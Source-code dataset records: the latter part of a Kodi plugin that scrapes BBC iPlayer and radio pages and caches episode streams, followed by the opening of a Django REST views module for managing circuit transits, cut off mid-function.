(name, res),\n 'path': url,\n 'thumbnail': thumbnail,\n 'is_playable': True\n })\n\n return items\n\n@plugin.route('/start_pvr_service')\ndef start_pvr_service():\n xbmc.executebuiltin('XBMC.RunPlugin(plugin://plugin.audio.bbc/pvr_service)')\n\n@plugin.route('/pvr_service')\ndef pvr_service():\n pvrs = plugin.get_storage('pvrs')\n for name in pvrs:\n #log(name)\n split = pvrs[name].split('|')\n url = split[0]\n if len(split) > 0:\n iconimage = split[1]\n else:\n iconimage = \"\"\n if '/episodes/' in url:\n #log(url)\n cache_all(url)\n else:\n #log((url,name))\n play_episode(url,name,iconimage,\"cache\")\n\n\n@plugin.route('/cache_all/')\ndef cache_all(url):\n #log((\"CCC\",url))\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0'}\n html = get(url)\n if not html:\n return\n\n items = []\n html_items=html.split('data-ip-id=\"')\n for p in html_items:\n IPID=p.split('\"')[0]\n urls=re.compile('href=\"(.+?)\"').findall (p)\n\n episode_url = ''\n episodes_url = ''\n for u in urls:\n if u.startswith('/iplayer/episode/'):\n episode_url = 'http://www.bbc.co.uk%s' % u\n elif u.startswith('/iplayer/episodes/'):\n episodes_url = 'http://www.bbc.co.uk%s' % u\n\n name = re.compile('title=\"(.+?)\"').findall (p)[0]\n\n series = 0\n episode = None\n match = re.compile('Episode ([0-9]*)$').search (name)\n if match:\n episode = int(match.group(1))\n else:\n match = re.compile('Series ([0-9]*): ([0-9]*)\\.').search (name)\n if match:\n series = int(match.group(1))\n episode = int(match.group(2))\n else:\n match = re.compile(', ([0-9]*)\\.').search (name)\n if match:\n episode = int(match.group(1))\n group = ''\n match=re.compile('top-title\">(.+?)<').findall (p)\n if match:\n group = match[0]\n\n iconimage = get_icon_path('tv')\n match=re.compile('img src=\"(.+?)\"').findall (p)\n if match:\n iconimage = match[0]\n else:\n match=re.compile('srcset=\"(.+?)\"').findall (p)\n if match:\n iconimage = match[0]\n\n if episode:\n label = \"%s S%03dE%03d\" % (name,series,episode)\n label = re.sub('[%s]' % re.escape(':\\/?*><|'),'',label)\n #log((episode_url,label,iconimage))\n play_episode(episode_url,label,iconimage,\"cache\")\n\n\n next_page = re.compile('///')\ndef play_episode(url,name,thumbnail,action):\n if action == \"cache\":\n cached = plugin.get_storage('cached')\n if name in cached:\n return\n html = get(url)\n #log(url)\n #log(html)\n if not html:\n return\n vpid = ''\n match = re.search(r'\"vpid\":\"(.+?)\"', html, re.DOTALL)\n if match:\n vpid = match.group(1)\n '''\n match = re.search(r'mediator.bind\\((.*?), document\\.getElementById\\(\\'tviplayer\\'\\)\\);', html, re.DOTALL)\n if match:\n data = match.group(1)\n import json\n json_data = json.loads(data)\n #print json.dumps(json_data, indent=2, sort_keys=True)\n json_name = json_data['episode']['title']\n try:\n synopses = json_data['episode']['synopses']\n if 'large' in synopses:\n description = synopses['large']\n elif 'medium' in synopses:\n description = synopses['medium']\n else:\n description = synopses['small']\n except:\n description = ''\n image = json_data['episode']['images']['standard'].replace('{recipe}','832x468')\n for stream in json_data['episode']['versions']:\n if ((stream['kind'] == 'original') or\n (stream['kind'] == 'iplayer-version')):\n vpid = stream_id_st = stream['id']\n '''\n if not vpid:\n return\n\n NEW_URL = \"http://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/apple-ipad-hls/vpid/%s/proto/http?cb=%d\" % (vpid, random.randrange(10000,99999)) #NOTE magic from get_iplayer\n\n html = get(NEW_URL)\n\n # Parse the different streams and add them as new directory entries.\n match = re.compile(\n 'media.+?bitrate=\"(.+?)\".+?encoding=\"(.+?)\".+?connection.+?href=\"(.+?)\".+?supplier=\"(.+?)\".+?transferFormat=\"(.+?)\"'\n ).findall(html)\n\n URL = []\n for bitrate, encoding, url, supplier, transfer_format in match:\n URL.append((int(bitrate),url))\n\n if action == \"autoplay\":\n URL=max(URL)[1]\n item = {\n 'label': name,\n 'path': URL,\n 'thumbnail': thumbnail\n }\n #if subtitles and plugin.get_setting('subtitles') == 'true':\n # plugin.set_resolved_url(item,'special://profile/addon_data/plugin.audio.bbc/subtitles.srt')\n #else:\n plugin.set_resolved_url(item)\n\n elif action == \"list\":\n items = []\n for u in sorted(URL, reverse=True):\n items.append({\n 'label': \"%s [%d kbps]\" % (name, u[0]),\n 'path': u[1],\n 'thumbnail': thumbnail,\n 'is_playable': True\n })\n return items\n elif action == \"cache\":\n cached = plugin.get_storage('cached')\n if name in cached:\n return\n URL=max(URL)[1]\n BASE = re.compile('/[^/]*?$').sub('/',URL)\n #log(URL)\n html = get(URL)\n #log(html)\n if not html:\n return\n\n if \"variants\" in html:\n lines = html.splitlines()\n last = lines[-1]\n URL = BASE + last\n html = get(URL)\n #log(html)\n lines = html.splitlines()\n if not URL.startswith('http'):\n return\n html = get(URL)\n lines = html.splitlines()\n basename = '%s%s' % (plugin.get_setting('cache'), re.sub('[\\\\/:]','',name))\n #xbmcvfs.copy('special://profile/addon_data/plugin.audio.bbc/subtitles.srt',\"%s.srt\" % basename)\n f = xbmcvfs.File(\"%s.ts\" % basename,'wb')\n chunks = [x for x in lines if not x.startswith('#')]\n if plugin.get_setting('cache.progress') == 'true':\n progress = True\n else:\n progress = False\n if progress:\n d = xbmcgui.DialogProgressBG()\n d.create('BBC','%s' % name)\n total = len(chunks)\n count = 0\n else:\n xbmcgui.Dialog().notification(\"BBC Cache Started\",name)\n for chunk in chunks:\n if not chunk.startswith('http'):\n chunk = BASE+chunk\n #log(chunk)\n data = get(chunk)\n f.write(data)\n if progress:\n percent = int(100.0 * count / total)\n d.update(percent, \"BBC\", \"%s\" % name)\n count = count + 1\n f.close()\n cached[name] = datetime.datetime.now()\n if progress:\n d.close()\n else:\n xbmcgui.Dialog().notification(\"BBC Cache Finished\",name)\n\n\n\n@plugin.route('/alphabet')\ndef alphabet():\n items = []\n for letter in char_range('A', 'Z'):\n url = 'http://www.bbc.co.uk/programmes/a-z/by/%s/player' % letter\n items.append({\n 'label': letter,\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':get_icon_path('lists'),\n })\n letter = \" \"\n url = 'http://www.bbc.co.uk/programmes/a-z/by/%40/player'\n items.append({\n 'label': \"0-9\",\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':get_icon_path('lists'),\n })\n\n return items\n\ndef char_range(c1, c2):\n for c in xrange(ord(c1), ord(c2)+1):\n yield chr(c)\n\n@plugin.route('/letter/')\ndef letter(letter):\n url = 'http://www.bbc.co.uk/programmes/a-z/by/%s/player' % letter\n #url = 'http://www.bbc.co.uk/iplayer/a-z/%s' % letter\n html = get(url)\n\n items = []\n match=re.compile('(.+?)',re.DOTALL).findall (html)\n for url , name in match:\n url = \"http://www.bbc.co.uk/iplayer/episodes/%s\" % url\n thumbnail = get_icon_path('lists')\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add Favourite', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_favourite, name=name, url=url, thumbnail=thumbnail, is_episode=False))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add to PVR', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_pvr, name=name, url=url, thumbnail=thumbnail, is_episode=False))))\n items.append({\n 'label': unescape(name),\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':thumbnail,\n 'context_menu': context_items,\n })\n return items\n\n\n@plugin.route('/channel_a_z')\ndef channel_a_z():\n channel_list = [\n ('bbcone', 'bbc_one_hd', 'BBC One'),\n ('bbctwo', 'bbc_two_hd', 'BBC Two'),\n ('tv/bbcthree', 'bbc_three_hd', 'BBC Three'),\n ('bbcfour', 'bbc_four_hd', 'BBC Four'),\n ('tv/cbbc', 'cbbc_hd', 'CBBC'),\n ('tv/cbeebies', 'cbeebies_hd', 'CBeebies'),\n ('tv/bbcnews', 'bbc_news24', 'BBC News Channel'),\n ('tv/bbcparliament', 'bbc_parliament', 'BBC Parliament'),\n ('tv/bbcalba', 'bbc_alba', 'Alba'),\n ('tv/s4c', 's4cpbs', 'S4C'),\n ]\n items = []\n for id, img, name in channel_list:\n icon = 'special://home/addons/plugin.audio.bbc/resources/img/%s.png' % img\n url = \"http://www.bbc.co.uk/%s/a-z\" % id\n items.append({\n 'label' : name,\n 'thumbnail' : icon,\n 'path' : plugin.url_for('page',url=url),\n 'is_playable' : False\n })\n return items\n\n@plugin.route('/new_page/')\ndef new_page(url):\n page_url = url\n #llog((\"NNN\",url))\n just_episodes=False\n \"\"\" Generic Radio page scraper. \"\"\"\n\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n\n\n pDialog = xbmcgui.DialogProgressBG()\n pDialog.create(\"BBC Radio\")\n\n try:\n html = get(page_url)\n except:\n return\n #llog(\"XXX\")\n #log((\"HHH\",html))\n items = []\n total_pages = 1\n current_page = 1\n page_range = range(1)\n paginate = re.search(r'',html)\n next_page = 1\n if paginate:\n if plugin.get_setting('page') == \"true\":\n current_page_match = re.search(r'page=(\\d*)', page_url)\n if current_page_match:\n current_page = int(current_page_match.group(1))\n page_range = range(current_page, current_page+1)\n next_page_match = re.search(r'

  • ', paginate.group(0))\n if next_page_match:\n page_base_url = next_page_match.group(1)\n next_page = int(next_page_match.group(2))\n else:\n next_page = current_page\n page_range = range(current_page, current_page+1)\n else:\n pages = re.findall(r'',paginate.group(0))\n if pages:\n last = pages[-1]\n last_page = re.search(r' current_page:\n page_url = 'http://www.bbc.co.uk' + page_base_url + str(page)\n html = get(page_url)\n\n\n programme_items = html.split('class=\"programme-item ')\n for programme_item in programme_items:\n #llog(programme_item)\n\n link = re.search('href=\"(/programmes/.+?)\"',programme_item)\n if link:\n link = link.group(1)\n #llog(link)\n\n episodes = re.search('href=\"(/programmes/.+?/episodes)\"',programme_item)\n if episodes:\n episodes = episodes.group(1)\n #llog(episodes)\n\n title = re.search('class=\"programme-item-title.+?>(.+?)<',programme_item)\n if title:\n title = unescape(title.group(1))\n #llog(title)\n\n\n subtitle = re.search('class=\"programme-item-subtitle.+?>(.+?)<',programme_item)\n if subtitle:\n subtitle = unescape(subtitle.group(1))\n #llog(subtitle)\n\n image = get_icon_path('live')\n if link:\n if not link.startswith('http'):\n link = \"http://www.bbc.co.uk\"+link\n label = \"%s - %s\" % (title,subtitle)\n items.append({\n 'label': label,\n 'path': plugin.url_for('play_episode', url=link, name=label,thumbnail=image,action=action),\n 'thumbnail':image,\n 'is_playable' : autoplay,\n #'context_menu': context_items,\n })\n image = get_icon_path('folder')\n if episodes:\n if not episodes.startswith('http'):\n episodes = \"http://www.bbc.co.uk\"+episodes\n path = plugin.url_for('page', url=episodes)\n items.append({\n 'label': \"[B]%s[/B]\" % (title),\n 'path': path,\n 'thumbnail':image,\n #'is_playable' : autoplay,\n #'context_menu': context_items,\n })\n\n\n if plugin.get_setting('radio_paginate_episodes') == \"true\":\n if current_page < next_page:\n page_url = 'http://www.bbc.co.uk' + page_base_url + str(next_page)\n #AddMenuEntry(\" [COLOR ffffa500]%s >>[/COLOR]\" % translation(30320), page_url, 136, '', '', '')\n items.append({\n 'label': \">>\",\n 'path': 'http://www.bbc.co.uk' + page_base_url + str(next_page),\n 'thumbnail':\"\",\n })\n\n #BUG: this should sort by original order but it doesn't (see http://trac.kodi.tv/ticket/10252)\n #xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_UNSORTED)\n #xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_VIDEO_TITLE)\n\n pDialog.close()\n\n return items\n\n@plugin.route('/page/')\ndef page(url):\n page_url = url\n #llog(url)\n just_episodes=False\n \"\"\" Generic Radio page scraper. \"\"\"\n\n pDialog = xbmcgui.DialogProgressBG()\n pDialog.create(\"BBC Radio\")\n\n html = get(page_url)\n items = []\n total_pages = 1\n current_page = 1\n page_range = range(1)\n paginate = re.search(r'',html)\n next_page = 1\n if paginate:\n if plugin.get_setting('page') == \"true\":\n current_page_match = re.search(r'page=(\\d*)', page_url)\n if current_page_match:\n current_page = int(current_page_match.group(1))\n page_range = range(current_page, current_page+1)\n next_page_match = re.search(r'
  • ', paginate.group(0))\n if next_page_match:\n page_base_url = next_page_match.group(1)\n next_page = int(next_page_match.group(2))\n else:\n next_page = current_page\n page_range = range(current_page, current_page+1)\n else:\n pages = re.findall(r'',paginate.group(0))\n if pages:\n last = pages[-1]\n last_page = re.search(r' current_page:\n page_url = 'http://www.bbc.co.uk' + page_base_url + str(page)\n html = get(page_url)\n\n #llog(html)\n masthead_title = ''\n masthead_title_match = re.search(r'(.+?)', html)\n if masthead_title_match:\n masthead_title = masthead_title_match.group(1)\n #llog((\"MMM\",masthead_title))\n list_item_num = 1\n\n programmes = html.split('
    (.+?)', programme)\n if name_match:\n name = name_match.group(1)\n\n subtitle = ''\n subtitle_match = re.search(r'(.*?)(.*?property=\"name\">(.*?))?', programme)\n if subtitle_match:\n series = subtitle_match.group(1)\n episode = subtitle_match.group(3)\n if episode:\n subtitle = \"(%s, %s)\" % (series, episode)\n else:\n if series.strip():\n subtitle = \"(%s)\" % series\n\n image = ''\n image_match = re.search(r'', programme)\n if image_match:\n image = image_match.group(1)\n\n synopsis = ''\n synopsis_match = re.search(r'(.+?)', programme)\n if synopsis_match:\n synopsis = synopsis_match.group(1)\n\n station = ''\n station_match = re.search(r'

    (.+?).*?

    ', programme)\n if station_match:\n station = station_match.group(1).strip()\n\n series_title = \"[B]%s - %s[/B]\" % (station, name)\n if just_episodes:\n title = \"[B]%s[/B] - %s\" % (masthead_title, name)\n elif station:\n title = \"[B]%s[/B] - %s %s\" % (station, name, subtitle)\n else:\n title = \"[B]%s[/B] - %s\" % (masthead_title, name)\n if series_url:\n #AddMenuEntry(series_title, series_url, 131, image, synopsis, '')\n items.append({\n 'label': series_title,\n 'path': plugin.url_for('page', url=\"http://www.bbc.co.uk\"+series_url),\n 'thumbnail':image,\n })\n elif programme_id: #TODO maybe they are not always mutually exclusive\n\n url = \"http://www.bbc.co.uk/programmes/%s\" % programme_id\n #CheckAutoplay(title, url, image, ' ', '')\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add Favourite', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_favourite, name=title, url=url, thumbnail=image, is_episode=True))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add to PVR', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_pvr, name=title, url=url, thumbnail=image, is_episode=True))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('play_episode',url=url,name=title,thumbnail=image,action=\"cache\"))))\n items.append({\n 'label': title,\n 'path': plugin.url_for('play_episode', url=url, name=title,thumbnail=image,action=action),\n 'thumbnail':image,\n 'is_playable' : autoplay,\n 'context_menu': context_items,\n })\n\n percent = int(100*(page+list_item_num/len(programmes))/total_pages)\n pDialog.update(percent,name)\n\n list_item_num += 1\n\n percent = int(100*page/total_pages)\n pDialog.update(percent,\"BBC Radio\")\n\n\n if plugin.get_setting('radio_paginate_episodes') == \"true\":\n if current_page < next_page:\n page_url = 'http://www.bbc.co.uk' + page_base_url + str(next_page)\n #AddMenuEntry(\" [COLOR ffffa500]%s >>[/COLOR]\" % translation(30320), page_url, 136, '', '', '')\n items.append({\n 'label': \">>\",\n 'path': 'http://www.bbc.co.uk' + page_base_url + str(next_page),\n 'thumbnail':\"\",\n })\n\n #BUG: this should sort by original order but it doesn't (see http://trac.kodi.tv/ticket/10252)\n #xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_UNSORTED)\n #xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_VIDEO_TITLE)\n\n pDialog.close()\n\n return items\n\n@plugin.route('/add_pvr////')\ndef add_pvr(name,url,thumbnail,is_episode):\n pvrs = plugin.get_storage('pvrs')\n pvrs[name] = '|'.join((url,thumbnail,is_episode))\n\n@plugin.route('/remove_pvr/')\ndef remove_pvr(name):\n pvrs = plugin.get_storage('pvrs')\n del pvrs[name]\n xbmc.executebuiltin('Container.Refresh')\n\n@plugin.route('/add_favourite////')\ndef add_favourite(name,url,thumbnail,is_episode):\n favourites = plugin.get_storage('favourites')\n favourites[name] = '|'.join((url,thumbnail,is_episode))\n\n@plugin.route('/remove_favourite/')\ndef remove_favourite(name):\n favourites = plugin.get_storage('favourites')\n del favourites[name]\n xbmc.executebuiltin('Container.Refresh')\n\n@plugin.route('/remove_search/')\ndef remove_search(name):\n searches = plugin.get_storage('searches')\n del searches[name]\n xbmc.executebuiltin('Container.Refresh')\n\n@plugin.route('/new_search')\ndef new_search():\n d = xbmcgui.Dialog()\n what = d.input(\"New Search\")\n if what:\n searches = plugin.get_storage('searches')\n searches[what] = ''\n return search(what)\n\n@plugin.route('/search/')\ndef search(what):\n if not what:\n return\n #url = 'http://www.bbc.co.uk/radio/programmes/a-z/by/%s/current' % search_entered\n url= 'http://www.bbc.co.uk/search?filter=programmes&q=%s' % what.replace(' ','%20')\n return page(url)\n\n@plugin.route('/searches')\ndef searches():\n searches = plugin.get_storage('searches')\n items = []\n\n items.append({\n 'label': 'New Search',\n 'path': plugin.url_for('new_search'),\n 'thumbnail':get_icon_path('search'),\n })\n for search in sorted(searches):\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Remove Search', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(remove_search, name=search))))\n items.append({\n 'label': search,\n 'path': plugin.url_for('search',what=search),\n 'thumbnail':get_icon_path('search'),\n 'context_menu': context_items,\n })\n return items\n\n@plugin.route('/favourites')\ndef favourites():\n global big_list_view\n big_list_view = True\n favourites = plugin.get_storage('favourites')\n items = []\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n for name in sorted(favourites):\n fav = favourites[name]\n url,iconimage,is_episode = fav.split('|')\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Remove Favourite', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(remove_favourite, name=name))))\n if is_episode == \"True\":\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('play_episode',url=url,name=name,thumbnail=iconimage,action=\"cache\"))))\n items.append({\n 'label': unescape(name),\n 'path': plugin.url_for('play_episode',url=url,name=name,thumbnail=iconimage,action=action),\n 'thumbnail':iconimage,\n 'is_playable' : autoplay,\n 'context_menu': context_items,\n })\n else:\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache All', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('cache_all',url=url))))\n items.append({\n 'label': \"[COLOR %s][B]%s[/B][/COLOR]\" % (remove_formatting(plugin.get_setting('group.colour')),unescape(name)),\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':iconimage,\n 'is_playable' : False,\n 'context_menu': context_items,\n })\n return items\n\n@plugin.route('/pvr_list')\ndef pvr_list():\n global big_list_view\n big_list_view = True\n pvrs = plugin.get_storage('pvrs')\n items = []\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n for name in sorted(pvrs):\n fav = pvrs[name]\n url,iconimage,is_episode = fav.split('|')\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Remove from PVR', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(remove_pvr, name=name))))\n if is_episode == \"True\":\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('play_episode',url=url,name=name,thumbnail=iconimage,action=\"cache\"))))\n items.append({\n 'label': unescape(name),\n 'path': plugin.url_for('play_episode',url=url,name=name,thumbnail=iconimage,action=action),\n 'thumbnail':iconimage,\n 'is_playable' : autoplay,\n 'context_menu': context_items,\n })\n else:\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache All', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('cache_all',url=url))))\n items.append({\n 'label': \"[COLOR %s][B]%s[/B][/COLOR]\" % (remove_formatting(plugin.get_setting('group.colour')),unescape(name)),\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':iconimage,\n 'is_playable' : False,\n 'context_menu': context_items,\n })\n return items\n\n@plugin.route('/categories')\ndef categories():\n url = 'https://www.bbc.co.uk/radio/categories'\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0'}\n html = get(url)\n\n if plugin.get_setting('categories') == '0':\n order = \"atoz\"\n else:\n order = \"dateavailable\"\n\n match = re.compile(\n 'href=\"(/radio/categories/.+?)\">(.+?)
    '\n ).findall(html)\n\n categories = {}\n for url, title in set(match):\n base = url.split('/')[-1]\n if '-' not in base:\n categories[base] = title\n\n items = []\n for url, title in set(match):\n base = url.split('/')[-1]\n category = ''\n if '-' in base:\n category, name = base.split('-')\n category = categories.get(category,category)\n name = title\n label = \"%s - %s\" % (category,name)\n else:\n category = title\n name = ''\n label = category\n\n url = 'https://www.bbc.co.uk%s' % (url)\n items.append({\n 'label': unescape(label),\n 'path': plugin.url_for('new_page',url=url),\n 'thumbnail':get_icon_path('lists'),\n })\n items = sorted(items, key=lambda x: x[\"label\"].lower())\n return items\n\n@plugin.route('/live_mpd')\ndef live_mpd():\n channel_list = [\n ('bbc_one_hd', 'BBC One'),\n ('bbc_two_hd', 'BBC Two'),\n ('bbc_four_hd', 'BBC Four'),\n ('cbbc_hd', 'CBBC'),\n ('cbeebies_hd', 'CBeebies'),\n ('bbc_news24', 'BBC News Channel'),\n ('bbc_parliament', 'BBC Parliament'),\n ('bbc_alba', 'Alba'),\n ('s4cpbs', 'S4C'),\n ('bbc_one_london', 'BBC One London'),\n ('bbc_one_scotland_hd', 'BBC One Scotland'),\n ('bbc_one_northern_ireland_hd', 'BBC One Northern Ireland'),\n ('bbc_one_wales_hd', 'BBC One Wales'),\n ('bbc_two_scotland', 'BBC Two Scotland'),\n ('bbc_two_northern_ireland_digital', 'BBC Two Northern Ireland'),\n ('bbc_two_wales_digital', 'BBC Two Wales'),\n ('bbc_two_england', 'BBC Two England',),\n ('bbc_one_cambridge', 'BBC One Cambridge',),\n ('bbc_one_channel_islands', 'BBC One Channel Islands',),\n ('bbc_one_east', 'BBC One East',),\n ('bbc_one_east_midlands', 'BBC One East Midlands',),\n ('bbc_one_east_yorkshire', 'BBC One East Yorkshire',),\n ('bbc_one_north_east', 'BBC One North East',),\n ('bbc_one_north_west', 'BBC One North West',),\n ('bbc_one_oxford', 'BBC One Oxford',),\n ('bbc_one_south', 'BBC One South',),\n ('bbc_one_south_east', 'BBC One South East',),\n ('bbc_one_west', 'BBC One West',),\n ('bbc_one_west_midlands', 'BBC One West Midlands',),\n ('bbc_one_yorks', 'BBC One Yorks',),\n ]\n items = []\n for id,name in channel_list:\n icon = 'special://home/addons/plugin.audio.bbc.live.mpd/resources/media/%s.png' % id\n path = 'http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/dash/uk/dash_pc/ak/%s.mpd' % id\n item = ListItem(label=name,icon=icon,path=path)\n item.set_property('inputstreamaddon', 'inputstream.adaptive')\n item.set_property('inputstream.adaptive.manifest_type', 'mpd')\n item.set_is_playable(True)\n items.append(item)\n return items\n\n@plugin.route('/')\ndef index():\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'PVR Service', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('start_pvr_service'))))\n items = [\n {\n 'label': 'Live',\n 'path': plugin.url_for('live'),\n 'thumbnail':get_icon_path('tv'),\n },\n #{\n # 'label': 'Red Button',\n # 'path': plugin.url_for('red_button'),\n # 'thumbnail':get_icon_path('red_button'),\n #},\n #{\n # 'label': 'Schedules',\n # 'path': plugin.url_for('schedules'),\n # 'thumbnail':get_icon_path('tv'),\n #},\n #{\n # 'label': 'Most Popular',\n # 'path': plugin.url_for('page',url='http://www.bbc.co.uk/radio/popular'),\n # 'thumbnail':get_icon_path('top'),\n #},\n #{\n # 'label': 'Search',\n # 'path': plugin.url_for('searches'),\n # 'thumbnail':get_icon_path('search'),\n #},\n {\n 'label': 'A-Z',\n 'path': plugin.url_for('alphabet'),\n 'thumbnail':get_icon_path('lists'),\n },\n #{\n # 'label': 'Channel A-Z',\n # 'path': plugin.url_for('channel_a_z'),\n # 'thumbnail':get_icon_path('lists'),\n #},\n {\n 'label': 'Categories',\n 'path': plugin.url_for('categories'),\n 'thumbnail':get_icon_path('lists'),\n },\n {\n 'label': 'Favourites',\n 'path': plugin.url_for('favourites'),\n 'thumbnail':get_icon_path('favourites'),\n },\n {\n 'label': 'PVR',\n 'path': plugin.url_for('pvr_list'),\n 'thumbnail':get_icon_path('clock'),\n 'context_menu': context_items,\n },\n #{\n # 'label': 'Make Live Playlist',\n # 'path': plugin.url_for('make_playlist'),\n # 'thumbnail':get_icon_path('settings'),\n #},\n ]\n return items\n\n\nif __name__ == '__main__':\n plugin.run()\n if big_list_view == True:\n view_mode = int(plugin.get_setting('view_mode'))\n if view_mode:\n plugin.set_view_mode(view_mode)","repo_name":"primaeval/plugin.audio.bbc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":54494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28667642925","text":"# coding: utf-8\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView, CreateAPIView, RetrieveUpdateDestroyAPIView, get_object_or_404\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom knox.auth import TokenAuthentication\nfrom django.db.models import Q\nfrom apps.accounts.permissions import IsPervichkaOnly\nfrom apps.opu.circuits.serializers import CircuitTrassaList\nfrom apps.opu.circuits.service import create_circuit_transit\nfrom apps.opu.objects.serializers import PGListSerializer, TransitCreateSerializer, \\\n TransitDetailSerializer, BridgeListSerializer\nfrom apps.opu.circuits.models import Circuit, CircuitTransit\nfrom apps.opu.circuits.serializers import CircuitList\nfrom apps.opu.objects.models import Object, Point, Transit, Bridge\nfrom apps.opu.objects.serializers import PointList, ObjectListSerializer\nfrom apps.opu.objects.services import check_circuit_transit\n\nfrom apps.accounts.permissions import SuperUser, IngenerUser\n\n\nclass PointListTrassa(ListAPIView):\n \"\"\"Список ИП для создания трассы\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n queryset = Point.objects.all().order_by('point').values('id', 'point', 'name')\n serializer_class = PointList\n\n\nclass SelectPointView(APIView):\n \"\"\"Выбор ИП для фильтрацы ЛП\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, pk):\n point = Point.objects.get(pk=pk)\n lps = Object.objects.filter(Q(point1=point) | Q(point2=point), id_parent=None)\n serializer = ObjectListSerializer(lps, many=True).data\n return Response(serializer)\n\n\nclass ObjectList(APIView):\n \"\"\"Список ПГ, ВГ итд\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, pk):\n obj = Object.objects.get(pk=pk)\n childs = obj.parents.all()\n serializer = ObjectListSerializer(childs, many=True).data\n return Response(serializer)\n\n\n'''Создание трассы для каналов'''\nclass PGCircuitListView(APIView):\n \"\"\"Выбор PG для создания трассы circuits\"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, IsPervichkaOnly | SuperUser, IngenerUser | SuperUser)\n\n def get(self, request, pk):\n obj = Object.objects.get(pk=pk)\n childs = obj.parents.all()\n pg = []\n while childs:\n newchilds = []\n for c in childs:\n if c.type_of_trakt.name == 'ПГ':\n pg.append(c)\n newchilds += c.parents.all()\n childs = newchilds\n serializer = PGListSerializer(pg, many=True).data\n return Response(serializer)\n\n\nclass SelectCircuitView(APIView):\n \"\"\"Выбор каналы для фильтрацы каналов\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, pk):\n obj = Object.objects.get(pk=pk)\n circuits = Circuit.objects.filter(object=obj)\n serializer = CircuitTrassaList(circuits, many=True).data\n return Response(serializer)\n\n\nclass CircuitListTrassa(ListAPIView):\n \"\"\"Список circuits для ��оздания трассы\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n queryset = Circuit.objects.all().order_by('num_circuit')\n serializer_class = CircuitList\n\n\nclass TransitCreateAPIView(CreateAPIView):\n queryset = Transit.objects.all()\n serializer_class = TransitCreateSerializer\n permission_classes = (IsAuthenticated, IsPervichkaOnly | SuperUser, IngenerUser | SuperUser)\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n new_trassa = set(Object.objects.get(id=pk) for pk in request.data[\"trassa\"])\n if self.request.data[\"create_circuit_transit\"]:\n if not check_circuit_transit(new_trassa):\n return Response({\"detail\": \"Транзит провести нельзя, оконечный объект трассы участвует в транзите\"},\n status=status.HTTP_403_FORBIDDEN)\n for obj in new_trassa:\n for bridge in obj.bridges.filter(transit__create_circuit_transit=True):\n bridge.transit.create_circuit_transit = False\n 